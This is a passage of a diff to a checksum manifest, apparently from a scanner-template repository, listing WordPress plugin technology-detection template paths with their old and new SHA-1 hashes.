+http/technologies/wordpress/plugins/better-wp-security.yaml:6659ac3f5e10efcc1e315ea318f93f6e2105d684 +http/technologies/wordpress/plugins/black-studio-tinymce-widget.yaml:b27e48c9ab41222370e01052d80a9172e49d6792 +http/technologies/wordpress/plugins/breadcrumb-navxt.yaml:0520e77c46cdf7203e44a1af15d5864e64d69687 +http/technologies/wordpress/plugins/breeze.yaml:15df08e7d225634a7905615007220f8de4ebd4f1 +http/technologies/wordpress/plugins/broken-link-checker.yaml:161f39e6df1389e17ede38d75a4b380cd07d8c18 +http/technologies/wordpress/plugins/child-theme-configurator.yaml:4e886b59f15671782c73547b5c708372c59bd289 +http/technologies/wordpress/plugins/classic-editor.yaml:c992b5934a0f97be00a6d868e13aba2e04b44dc8 +http/technologies/wordpress/plugins/classic-widgets.yaml:e64bd24ed8593b6d855ea7d4586a0c9de00a9e94 +http/technologies/wordpress/plugins/click-to-chat-for-whatsapp.yaml:b8a9ed81190e5f93db1f216194266d5a9a1156da http/technologies/wordpress/plugins/cloudflare.yaml:77ed711d2f95dbfd368b8018e0859cc792bd92e8 -http/technologies/wordpress/plugins/cmb2.yaml:4b3bfa4f94b99997f974f02d6ba60bde2e9444ff -http/technologies/wordpress/plugins/coblocks.yaml:a26991d803bee4cd24a8fee62e7eea4c1bb2d43a -http/technologies/wordpress/plugins/code-snippets.yaml:d1187e6e58951bbe1df401c1672bfdff86f7422e -http/technologies/wordpress/plugins/coming-soon.yaml:516f9d73fc15789a4c0fd099fc7e4a95fdb0f14f -http/technologies/wordpress/plugins/complianz-gdpr.yaml:eabd8b2e7f97de8a60b3a5fb96527910bbbad58d -http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:f28aad38a4e879235502a3c7abc1eaac996a53af -http/technologies/wordpress/plugins/contact-form-7.yaml:7ce85ff130f51b9380933293b884a7bd421404eb -http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:6acd231ac9daa0db29c8cd2ffc15f41bc9ababfb -http/technologies/wordpress/plugins/cookie-law-info.yaml:1105f8252666a84437fde4945cb5a745ad4cc50e -http/technologies/wordpress/plugins/cookie-notice.yaml:b9cf44d527d7f63a289ac0abad8b1bf0391c678c -http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:fd3988a6aa03120a677f1ac21834661ce302bf06 -http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:9e9f37e33437158126c61d2345001ba7d43111e7 -http/technologies/wordpress/plugins/custom-css-js.yaml:ac02742559638f742970cf6f592b71ef94d7f9e0 -http/technologies/wordpress/plugins/custom-fonts.yaml:b5239c6679c226595580307f84fbc3db513ed75c -http/technologies/wordpress/plugins/custom-post-type-ui.yaml:e185e81e02d08d559172e553c9f18124e8b73cf9 -http/technologies/wordpress/plugins/disable-comments.yaml:09bef99b79703f8fb60a432875789f36c26d7606 -http/technologies/wordpress/plugins/disable-gutenberg.yaml:589db5b5a0c17c5eaa8aed3193f9b69c9c23d157 -http/technologies/wordpress/plugins/duplicate-page.yaml:d686911fad8f2cb38247ac68abde6798a75b3d1a -http/technologies/wordpress/plugins/duplicate-post.yaml:95098c9e322716725f42517fa291102be287a7b5 -http/technologies/wordpress/plugins/duplicator.yaml:492e234d249eac52e0108c1bef2ecd318f8264a7 -http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:f4ad26e875f78de817b30426b87b4a68cbaeaea2 -http/technologies/wordpress/plugins/easy-fancybox.yaml:e7f7398e360ec865076174206ebfa8588fe9d55e +http/technologies/wordpress/plugins/cmb2.yaml:eb5ac0db9f2887ac51df676198e67ff312cac9b5 +http/technologies/wordpress/plugins/coblocks.yaml:c0bcb3427d20c790e416a49e835a1024a720614b +http/technologies/wordpress/plugins/code-snippets.yaml:57b1357527e40895bde483be54facc4a50e1248c +http/technologies/wordpress/plugins/coming-soon.yaml:4a30a84444d250a4e2bdc3cd3c26562c6861a888 +http/technologies/wordpress/plugins/complianz-gdpr.yaml:638c727119fe9622f32ef253ddbe18f904a830ae +http/technologies/wordpress/plugins/contact-form-7-honeypot.yaml:75142c07c546ec39ff8e691fecf585250dffd629 +http/technologies/wordpress/plugins/contact-form-7.yaml:9d16eec5ee3cae07b7f66fcb49c39fae85bdc88e +http/technologies/wordpress/plugins/contact-form-cfdb7.yaml:b13146d8d2392b1eaf210fd7a1a5d9b0d9ba33d1 +http/technologies/wordpress/plugins/cookie-law-info.yaml:221b83b25e9aead2f1767d94637d6fa2d255d4b8 +http/technologies/wordpress/plugins/cookie-notice.yaml:1a174ac82a080d6ae04ab46e7cb786ed0fb4a9e5 +http/technologies/wordpress/plugins/creame-whatsapp-me.yaml:b8704432f4a5f52df1532dd75d138c6ed3bd89fd +http/technologies/wordpress/plugins/creative-mail-by-constant-contact.yaml:fccf0258b4fab0e5b8bed27b9ddd4babc9a888ca +http/technologies/wordpress/plugins/custom-css-js.yaml:e6c5bc1b314c3a3c67b99310ebaecf34af6ad19b +http/technologies/wordpress/plugins/custom-fonts.yaml:c91cb9d81012905a1afeb7d8a600cb1424b34263 +http/technologies/wordpress/plugins/custom-post-type-ui.yaml:f7b2141d01cefb840811062c2838f17422193770 +http/technologies/wordpress/plugins/disable-comments.yaml:0ee894fd578f2475cc33a8b6f25303561fc9b196 +http/technologies/wordpress/plugins/disable-gutenberg.yaml:b07490a2cd2b4235eb56a3eb8dc76e8708b45107 +http/technologies/wordpress/plugins/duplicate-page.yaml:6888d30e6cb2bd3ed3cbf6441371a2991b73808b +http/technologies/wordpress/plugins/duplicate-post.yaml:4305832e3db0bc5fdce33358f8f802d532190fbb +http/technologies/wordpress/plugins/duplicator.yaml:cc001b89825c6936620dfa76918c829946568577 +http/technologies/wordpress/plugins/duracelltomi-google-tag-manager.yaml:d030c3e52175a52b54f138b37f984e42b5c1432c +http/technologies/wordpress/plugins/easy-fancybox.yaml:1fc9d5bd627e8a2cf55c1ab2ac750602e8761390 http/technologies/wordpress/plugins/easy-google-fonts.yaml:1ac3ed149863a6ce5b4325901c49c6837a4c57ea -http/technologies/wordpress/plugins/easy-table-of-contents.yaml:d3c9f699fb74e4dc40d444164fa0494e1cf074b7 -http/technologies/wordpress/plugins/easy-wp-smtp.yaml:3b1527653b38dd2d7f394cc9533036489f9fce72 -http/technologies/wordpress/plugins/elementor.yaml:d4492f2c80f46cd5b7504d20216f6b04cb6f8e77 -http/technologies/wordpress/plugins/elementskit-lite.yaml:e860f44f9333f49b1db0078924daae6638877ffb -http/technologies/wordpress/plugins/enable-media-replace.yaml:68642f24029f3db57cae0875e14691319d3b70c8 -http/technologies/wordpress/plugins/envato-elements.yaml:7c6694d04e8f12566bae8c1a88d3b72af93d5bc1 -http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:0901f4c382a1bac147c98dc2e9eff2b4ddb7df8d -http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:1ab8aca4a953aa2c5d9a4d194e2dd542fc2f30a0 -http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:de8926a47352fc0663b8fda59114cadbadfccc30 -http/technologies/wordpress/plugins/fast-indexing-api.yaml:f8910398d8ff2b72d2cbed02c12969f91f1a98bb -http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:30f4140ccdd9537b0c43406fe41bafe606d3bc9f -http/technologies/wordpress/plugins/flamingo.yaml:2de9fdc9bd0b68fcf4d242b5f451f9ba3a2303a2 -http/technologies/wordpress/plugins/fluentform.yaml:70d27d79bda7c73e6d27c178bc5d94bf99464ad5 -http/technologies/wordpress/plugins/font-awesome.yaml:ace5d85da13205aeaf68512050aa814f985c5d4a -http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:570ff31870d573d58b0bf813509a9f6331a1a3a9 -http/technologies/wordpress/plugins/formidable.yaml:5fdb275f35683cea75e69608a0d6360fd6ad72ff -http/technologies/wordpress/plugins/forminator.yaml:4daad6ee961bae4cbcd3f28f38fcc75af7f51599 -http/technologies/wordpress/plugins/ga-google-analytics.yaml:9770b6b2bb9d584795991ddc406c0662d71631a1 -http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:042614556f90068b63495664f065b46e7074c2e4 -http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:afe2f77b9c4b46c0aa931a806ed9840da6c1b33e -http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:98365a23ec32288a7cdaaf87dd1356a294d7e087 -http/technologies/wordpress/plugins/google-listings-and-ads.yaml:8eb13bbd6a748173d4c23e37909d834d0cbf5a2d -http/technologies/wordpress/plugins/google-site-kit.yaml:778b90a6e429339ec5e54cf50f327d6ae5bd784b -http/technologies/wordpress/plugins/google-sitemap-generator.yaml:f398a714433ed09d8894a5b46f85810f499dd61b -http/technologies/wordpress/plugins/gtranslate.yaml:a18f0f38e19ba474614f541921ab8eb65f85f49b -http/technologies/wordpress/plugins/gutenberg.yaml:ceee17e0642153194bb5a73b86b8f5a5c4f633b0 -http/technologies/wordpress/plugins/happy-elementor-addons.yaml:8f93111aae8d5644d0ecc1df52e46e4588146630 +http/technologies/wordpress/plugins/easy-table-of-contents.yaml:39fe496817e0d81e9c0ee86f10004ea23978e20c +http/technologies/wordpress/plugins/easy-wp-smtp.yaml:085aef92f98fcaf8ef55a55f49a2e5e359511e61 +http/technologies/wordpress/plugins/elementor.yaml:c2edf54f4a460a9ae22d566e905e514228843b78 +http/technologies/wordpress/plugins/elementskit-lite.yaml:169a5ba36ab75e8f9ab15a7eafbf23e9ea4ef4f4 +http/technologies/wordpress/plugins/enable-media-replace.yaml:46aaf7f5bb1e4cef28fcda375cc41b3c39c86524 +http/technologies/wordpress/plugins/envato-elements.yaml:8f26bb5f5daac3c0a22b3d226e8b702c3fa26db1 +http/technologies/wordpress/plugins/essential-addons-for-elementor-lite.yaml:dcc91284536ff9de1bc34a1fb84c90670caa62bc +http/technologies/wordpress/plugins/ewww-image-optimizer.yaml:80b01b35dc1f6ff73d840cf9c08e97ee6a7d8243 +http/technologies/wordpress/plugins/facebook-for-woocommerce.yaml:ab610645bee96c5c43039050a627c8f0030187a0 +http/technologies/wordpress/plugins/fast-indexing-api.yaml:20c9261a62f0c32f5ac75409043a025b8a4ed6d1 +http/technologies/wordpress/plugins/favicon-by-realfavicongenerator.yaml:d55a4b37b35fd3b7c553b39ba211086ba5de6ac1 +http/technologies/wordpress/plugins/flamingo.yaml:31dd99add2277e18623b82319835f0e9f691283f +http/technologies/wordpress/plugins/fluentform.yaml:9b048a5fa49d7d64efbede89de2057581d98af55 +http/technologies/wordpress/plugins/font-awesome.yaml:e3ca531264bec7923784bcd912f6f3d85ef7446c +http/technologies/wordpress/plugins/force-regenerate-thumbnails.yaml:b8d40738109310109cc89989a9558705a423b752 +http/technologies/wordpress/plugins/formidable.yaml:7c70a876459f69253d69cb68bfb47e0b4e1d9843 +http/technologies/wordpress/plugins/forminator.yaml:96374ccbceff704741f31452ff6cba03e8536aca +http/technologies/wordpress/plugins/ga-google-analytics.yaml:ed88e4e823a6df77d01f009204f7274e93ce1ee2 +http/technologies/wordpress/plugins/gdpr-cookie-compliance.yaml:81153624d751d75cb25106c88f85964eb8e7fe16 +http/technologies/wordpress/plugins/google-analytics-dashboard-for-wp.yaml:57bcb9e70e9c5f453df464a54521bb77205112eb +http/technologies/wordpress/plugins/google-analytics-for-wordpress.yaml:311c9ea02092851400d2466dbfd4bc0f083a4b7f +http/technologies/wordpress/plugins/google-listings-and-ads.yaml:043d21037970c152de1a1f847c42eb9c22f7c0b6 +http/technologies/wordpress/plugins/google-site-kit.yaml:ca6367e1d9b7b6432c765e1d767d7a3c8c1dcbf4 +http/technologies/wordpress/plugins/google-sitemap-generator.yaml:e854b69e051aa978b81450922b4c7be67d7ac48b +http/technologies/wordpress/plugins/gtranslate.yaml:7f1007df8247545a5b82ab44b35993aa15adc8e7 +http/technologies/wordpress/plugins/gutenberg.yaml:c7e6ddc4751e154d1056463ab96542d62bf18453 +http/technologies/wordpress/plugins/happy-elementor-addons.yaml:9320890766e49a4b5fcc2f51161836685e1e0f8c http/technologies/wordpress/plugins/header-and-footer-scripts.yaml:1d20308687bcbd54bf13c6f4ed88aa5d5707b8e4 -http/technologies/wordpress/plugins/header-footer-code-manager.yaml:5128e3b8cf1661f485ad21c7919f0e3b118811c7 -http/technologies/wordpress/plugins/header-footer-elementor.yaml:b72e043c8ac73e657994809ad4f824b2d1e38b90 -http/technologies/wordpress/plugins/header-footer.yaml:0582524d74da4506668592a3a21e747a73fc1078 -http/technologies/wordpress/plugins/health-check.yaml:671ca5cc6adfb1f487c5d5ad4f4bd3521899a0cb -http/technologies/wordpress/plugins/hello-dolly.yaml:b1c31c3a503392b0893412df0bfd67f66a08e994 -http/technologies/wordpress/plugins/host-webfonts-local.yaml:431161cea9f7a563b18dd25f97cb35d8b35c1a9c -http/technologies/wordpress/plugins/imagify.yaml:43558db808bad1013f688374781f0496b0979f47 -http/technologies/wordpress/plugins/imsanity.yaml:eb23f855f666226a39bcd0c5e62bda222d670d43 -http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:15e3a0fe4e9d3c8b684ed81d7c38d8f5963cc7d5 -http/technologies/wordpress/plugins/instagram-feed.yaml:638a2ea1ff92407b33293b19f81421f64dcbbef2 -http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:8c5eb0b2685635bbcc3c4e86f0101c683f772d3b -http/technologies/wordpress/plugins/iwp-client.yaml:fdaace58d40935a6339104a99da4b9ff24b8f952 -http/technologies/wordpress/plugins/jetpack-boost.yaml:74eb899976e975822bc9083ea905466b752a6e65 -http/technologies/wordpress/plugins/jetpack.yaml:3bf5877fc44fa89f5f53dffd5d892e728223dd2e -http/technologies/wordpress/plugins/kadence-blocks.yaml:49b7614a27b836a156bf9a0c437a61bd15c15f0c -http/technologies/wordpress/plugins/kirki.yaml:ec2d3988189b72a91fda93ec951c89cea6d59ff9 -http/technologies/wordpress/plugins/leadin.yaml:cebb0c9f50604dbe0b5eba4a3562f361a57fffa9 -http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:fe1c531f813efce95c8465c0759e9d575ba2f8e9 -http/technologies/wordpress/plugins/limit-login-attempts.yaml:043593ddb5ba2ff26c9510d7a55d3281dbd26787 -http/technologies/wordpress/plugins/litespeed-cache.yaml:6007e19469fab7ddca44c19c461f53db8ad8d764 -http/technologies/wordpress/plugins/loco-translate.yaml:7753ed7a950fe3a2d63c8543c6cf817601e40c93 -http/technologies/wordpress/plugins/loginizer.yaml:b2311b9ed6e775374db2f7572c164dadc9c7230b +http/technologies/wordpress/plugins/header-footer-code-manager.yaml:9b63c25150c895c9bcbb42d5028bb65fa6443041 +http/technologies/wordpress/plugins/header-footer-elementor.yaml:757681179db8466201f306c8a5bfcf8b7b552d50 +http/technologies/wordpress/plugins/header-footer.yaml:368cb28857df369b212a9a90095081011f770b6e +http/technologies/wordpress/plugins/health-check.yaml:789e1c9f132000b4c5616b30629e6f37e199150d +http/technologies/wordpress/plugins/hello-dolly.yaml:d57a592eb2a04ed22c7bb6c65ed75856fb5b5378 +http/technologies/wordpress/plugins/host-webfonts-local.yaml:53850f03b37a3d97eb419a187401944b3dbd032e +http/technologies/wordpress/plugins/imagify.yaml:891b39fa644755432fefc29039dddcf215235dcb +http/technologies/wordpress/plugins/imsanity.yaml:a613eb1092193e438cb2f2f329b7d810981e57ac +http/technologies/wordpress/plugins/insert-headers-and-footers.yaml:ce0165dd5d8612307f29c3a165f549a7c1034c36 +http/technologies/wordpress/plugins/instagram-feed.yaml:05e194f3fee32eb16d7d234f3c5c4826bfa9af06 +http/technologies/wordpress/plugins/intuitive-custom-post-order.yaml:03463ef2a1e8cefebcea60fd2ffcb09d39954deb +http/technologies/wordpress/plugins/iwp-client.yaml:63936c412cd07e2769d9b2b28915e4c62fda76d2 +http/technologies/wordpress/plugins/jetpack-boost.yaml:279133a2bbc8a5f0eb4e8a41bfa0489d13f7830f +http/technologies/wordpress/plugins/jetpack.yaml:564f100225344a62547527ed62a3285b0b4bdccd +http/technologies/wordpress/plugins/kadence-blocks.yaml:0649d67617932b4441519366387ba35e7d52f54a +http/technologies/wordpress/plugins/kirki.yaml:f4871c07e6533ae698269ee62516e18381e8aa67 +http/technologies/wordpress/plugins/leadin.yaml:ece3ffad9e03b28fa226ca12596223d496933217 +http/technologies/wordpress/plugins/limit-login-attempts-reloaded.yaml:6745011f2a5b9ed2239d77146b9c50de3d4ae35d +http/technologies/wordpress/plugins/limit-login-attempts.yaml:dc6984f12d03cf293ba2cf0db4a20939fbbcc85b +http/technologies/wordpress/plugins/litespeed-cache.yaml:4816bb70c3a34f10a3787a6a9321bc5b0a2bdaec +http/technologies/wordpress/plugins/loco-translate.yaml:f07f249c121583a4b716708bdee960700cb4aa18 +http/technologies/wordpress/plugins/loginizer.yaml:f6e618f7e747623ea0ed0834d8ecd676a7e2f7d9 http/technologies/wordpress/plugins/loginpress.yaml:6bff3449a9e63df8989b80f20668802bcfa63e5e -http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:7da9f4925b1be42ce0552ca95bec9111ae393c0d -http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:64765191d6483e9d82f92d1051c8f02648c6b0ea -http/technologies/wordpress/plugins/mailpoet.yaml:0b8eb1db41ea1e6c1f3fc72d2b824c596fb1f87d -http/technologies/wordpress/plugins/maintenance.yaml:3705f256a8030b1cfef05f967a22fa510e815abd -http/technologies/wordpress/plugins/mainwp-child.yaml:f3a7fbd03a97e805645113a00cb6b10989559527 -http/technologies/wordpress/plugins/malcare-security.yaml:3bd2212a9b0b433f8312b48206cf8d212232e919 -http/technologies/wordpress/plugins/megamenu.yaml:ab4f78f2d5e298081cfbb7a118da4e8d5b585251 -http/technologies/wordpress/plugins/members.yaml:20382c460b37c9547478b41ba0bd18969085043e -http/technologies/wordpress/plugins/meta-box.yaml:a64bddea6cebdaa58c582704dfc6114d87db33d6 -http/technologies/wordpress/plugins/metform.yaml:bf6104c94b9bc47980e193d539dd81ca81ba7bae -http/technologies/wordpress/plugins/ml-slider.yaml:0b55d89bf2436fbf542a3cbc63a71826e24b7b50 -http/technologies/wordpress/plugins/newsletter.yaml:4939f22ce593ace75fad975661d91a09ddcd71e9 -http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:a3e9c29fbf8c1b8361d5058abc29ff87af6af78c -http/technologies/wordpress/plugins/nextgen-gallery.yaml:6d554cf38999c4f2268ef7595a54f1994f58c74f -http/technologies/wordpress/plugins/ninja-forms.yaml:8f67811676ecfb7f1d6bda1b2a347da35bc382f6 -http/technologies/wordpress/plugins/ocean-extra.yaml:d863b883d93ad5144cc03f5053c5731ef8123c11 -http/technologies/wordpress/plugins/official-facebook-pixel.yaml:191b4beb5fdb155022dabcb0e5b3d2dc182039e0 -http/technologies/wordpress/plugins/one-click-demo-import.yaml:ef52c5c58cface8a29dd3ab7c334c054c77d9ed8 -http/technologies/wordpress/plugins/optinmonster.yaml:f37b2eba6f4e268a9460e9739d8d5baad525be70 -http/technologies/wordpress/plugins/otter-blocks.yaml:c907909dff50fd5a204cc3b85224965c2a3758b7 -http/technologies/wordpress/plugins/password-protected.yaml:ff1b232d23d10cec1da1bbd6da1d2c1f85be779a -http/technologies/wordpress/plugins/pdf-embedder.yaml:36c7b3808215b738e6485e61e2d86d2f56784d12 +http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml:da7358be5f1c6ae0c7f515e19aa8f6083929ae33 +http/technologies/wordpress/plugins/mailchimp-for-wp.yaml:cff4b95cd18a5c163d08072d2be8d5340a5a28a0 +http/technologies/wordpress/plugins/mailpoet.yaml:503ed3ea3d4e8805c63e613363aec5e6ebc01353 +http/technologies/wordpress/plugins/maintenance.yaml:32189fcd43c056421eceb168f69cc5caedc7af3a +http/technologies/wordpress/plugins/mainwp-child.yaml:15689dfb6b573c4c817465ce5243768172ad52bd +http/technologies/wordpress/plugins/malcare-security.yaml:2e1c5cc7bbcee8720e6c6cb412b2858fac248688 +http/technologies/wordpress/plugins/megamenu.yaml:db943d14db9683181f9a323b944f02452287e9a8 +http/technologies/wordpress/plugins/members.yaml:c6653517731d44a546a8350889a54a87d66c1c97 +http/technologies/wordpress/plugins/meta-box.yaml:0bbb6235d7e92583c1f7eb18434de2f550f57a8b +http/technologies/wordpress/plugins/metform.yaml:335cb7e049844ad939ebdc118311cd117fd33b0b +http/technologies/wordpress/plugins/ml-slider.yaml:4c0ea0ddbe7470ad7ed2b61cd60463fba4d4bce9 +http/technologies/wordpress/plugins/newsletter.yaml:4e06e8bc420c388cc3efb16589edd1d47538fb1a +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:794e9a51fe4bfbea704702f24226525fb9ec9d8d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:d7bcf4488f9d9025682db9609b0d3f153ca41ee4 +http/technologies/wordpress/plugins/ninja-forms.yaml:deb98355ab94d563cf8df50f40117301ef8101bb +http/technologies/wordpress/plugins/ocean-extra.yaml:e8ae0f4fd381aa3a324d89cdd3ba601e43f3fff7 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:647d02f790ae7cc8a0a3dfccea4778798c768625 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:a1ad19ac87ae4baf1d3ce9669e6eccbb744d0e8e +http/technologies/wordpress/plugins/optinmonster.yaml:49614dff30c56429fcafdcdab4971f55291cd894 +http/technologies/wordpress/plugins/otter-blocks.yaml:50a70501e3ba00f21a2f8f87c39d1391a9da2150 +http/technologies/wordpress/plugins/password-protected.yaml:e7daaf683e06fe00c3593257fc3f62d671078f48 +http/technologies/wordpress/plugins/pdf-embedder.yaml:0083ed9b30aea7fae9ecea826fba16e05206d27c http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:988028ed95ba98427e7659a9ee664c6571e615d5 -http/technologies/wordpress/plugins/pixelyoursite.yaml:f96bdcba1c915994880c8612dc3b10feed1d8d3f -http/technologies/wordpress/plugins/polylang.yaml:38390b89bea14384c59ee3d787c3d2a5ef396e83 -http/technologies/wordpress/plugins/popup-builder.yaml:76dbd191f39696f62ac0be9b7e0a7619c300fc9a -http/technologies/wordpress/plugins/popup-maker.yaml:9898f98e8817a0a6eca29a652c9aa671ef897aaa -http/technologies/wordpress/plugins/post-smtp.yaml:fb3913d039e39bdfa909850be96a436c2daed0da -http/technologies/wordpress/plugins/post-types-order.yaml:f79cb83aa5e58f0845684ed7d79839a99080bcea -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:4c1a2a5ced317ec9fe1105d2171ce6d3b35c2bd4 -http/technologies/wordpress/plugins/pretty-link.yaml:f52eb94a236e0e95b8db45877a65ace2dd7d2b39 -http/technologies/wordpress/plugins/really-simple-captcha.yaml:4c8c8b459ea6a2452d1dddd9910b668e42fe3ab4 -http/technologies/wordpress/plugins/really-simple-ssl.yaml:c8f30313d72e2d2a6315fc30a8331f2eb9aa41ad -http/technologies/wordpress/plugins/redirection.yaml:78dbf29316c6ac3aa23678bd4aed69a5ddd42175 -http/technologies/wordpress/plugins/redux-framework.yaml:0f9712d7e86d87aff431070568cf1ea7cb5198e5 -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:8a4d0748905dc0457e96269db56428c7b2479864 -http/technologies/wordpress/plugins/safe-svg.yaml:2103b4bcb3c3e97d3a601618d4adf277da860845 -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:3abc289406b03c9a1a9a9c3a61f01adca40f3490 -http/technologies/wordpress/plugins/sg-cachepress.yaml:cc889ada7c90d40cc71b72a0d9fc976cacfa3e85 -http/technologies/wordpress/plugins/sg-security.yaml:0ab396fbd10115bbd286e7c229ac887e727390b1 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:22cf98912edc91bf3425771d400c10f6e39a0e92 -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:a15a92c4687e1f7bc6aab1849561ebc8a6522a7d -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:86f6b3755978c76efc238361006fba469776da59 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:659447b8573051f9c70a0583cfa878a495b3a855 +http/technologies/wordpress/plugins/pixelyoursite.yaml:58c90dade9bb03bccc83feaf85ba8f69ea28bbd3 +http/technologies/wordpress/plugins/polylang.yaml:bbb9668557efcd1c9edf2191f41fabc7c712f42c +http/technologies/wordpress/plugins/popup-builder.yaml:fdc7d81f7193a928634e92a5947b9fe203ec4975 +http/technologies/wordpress/plugins/popup-maker.yaml:60b5b11368519938244a75a6ab7a24b72fffd24a +http/technologies/wordpress/plugins/post-smtp.yaml:64807380e180b14a2fd79d3e72ac42882ec2a29a +http/technologies/wordpress/plugins/post-types-order.yaml:68b2e3574b4b1c2626ef6ef3adfba2ae8576645f +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:67e1c8db1ce351d4dac481a8b8e6ee5e2e6530e5 +http/technologies/wordpress/plugins/pretty-link.yaml:c20d198357e9b0d5a18c6467d74500a0f8c50dc1 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:d07b0ef1b1650b199645ee4310d633a09c91bd16 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:fb1b4fa2370f9c0d74f7de8b822373fa2d4e3bbc +http/technologies/wordpress/plugins/redirection.yaml:7977c25454c435b6d90d134af33ceef3c7d5b040 +http/technologies/wordpress/plugins/redux-framework.yaml:6660fc2c43ec018bd0c07abfb2131a3b0ffee2bc +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:7ab49be947a030ad8c6b7c4fc4bb4025622f1d9f +http/technologies/wordpress/plugins/safe-svg.yaml:0a47ebbc5ed328fc815ea5b3bad887005a30e0a6 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:874c041db9a2d8ac2d15a0f47ef760d132dbe813 +http/technologies/wordpress/plugins/sg-cachepress.yaml:53fe7b0b2ea386ba45078740d5d4e41403f05fa7 +http/technologies/wordpress/plugins/sg-security.yaml:3c6be8ea24c70c03e98a7b4e0acd31e1b88da46b +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:f5166b1f2a4cea3d18cd5d79c255333e96891725 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:fe022ae2dcc73ba03dbafac0ea70765058de3356 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f8c71c0b17feff1c8bbda1af251bc3ef60420d53 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:04beb993d2d664061085bd60104bcf086ee5f492 -http/technologies/wordpress/plugins/siteorigin-panels.yaml:a8b2262d950dd95e64f0f4d048fc4a6988853d81 -http/technologies/wordpress/plugins/smart-slider-3.yaml:bde8a44b6a8bfe6ce5208bbfc5fef9116b65c350 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:f3961e9e08694816f33e638acf1af19b4262a840 +http/technologies/wordpress/plugins/siteguard.yaml:ef57035687f18b406c5afc7f62f8907ab0b4b72e +http/technologies/wordpress/plugins/siteorigin-panels.yaml:1ebf46dfbd8710133f6adbe14c0d420f38a3cfd3 +http/technologies/wordpress/plugins/smart-slider-3.yaml:de9a0e20d9c791a854c34904ab769be0cd415d05 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:ca9ff24f27cbad632b1730f97e6a139783e87ba5 http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:404d69b6a6b8e3f3e450b281f6e7f03f409a0f3f -http/technologies/wordpress/plugins/sucuri-scanner.yaml:fee0a5d0516d042c28c9468ef8fb5d5e38ce26c6 -http/technologies/wordpress/plugins/svg-support.yaml:1937f2cbd2738469bf2bd738d98dde3f67e03fb1 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:63994d3a1e4a5b0122388621d2ef614a2eb37faa -http/technologies/wordpress/plugins/tablepress.yaml:b9d728ac847c6d44006d896e5cd3df57e4004f08 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:b3cd6a705aa73c6a09557b7cebc1d14097e4b1f2 -http/technologies/wordpress/plugins/the-events-calendar.yaml:60035e7a44045476cba892f90e28f535168ca338 +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:f2b246dfbedf803106177eddbc2f4e87da237801 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:d3fe7081e83b9736799980f273039480b974c2d4 +http/technologies/wordpress/plugins/svg-support.yaml:39b60996c4ad62c133cd1903d1e460fc35197085 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:22a26259acbed43640ec7d4c2bbda8bd5225408e +http/technologies/wordpress/plugins/tablepress.yaml:a8d3eb2dc6364b9ebf467bdb8177bb00a24ee42f +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:5160d169b2b7696c52d6e607630867297866a84c +http/technologies/wordpress/plugins/the-events-calendar.yaml:c4e097307f6827cbf735d6938508a6c8c5727585 http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:41f70c014363a9631cc63ff331f6fa4a55f7c903 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:54ca06f59600b8ff150a29ce4db9df67be689237 -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:007bc1a439e5ad52d345d0b21f6f92bbf8e48aa4 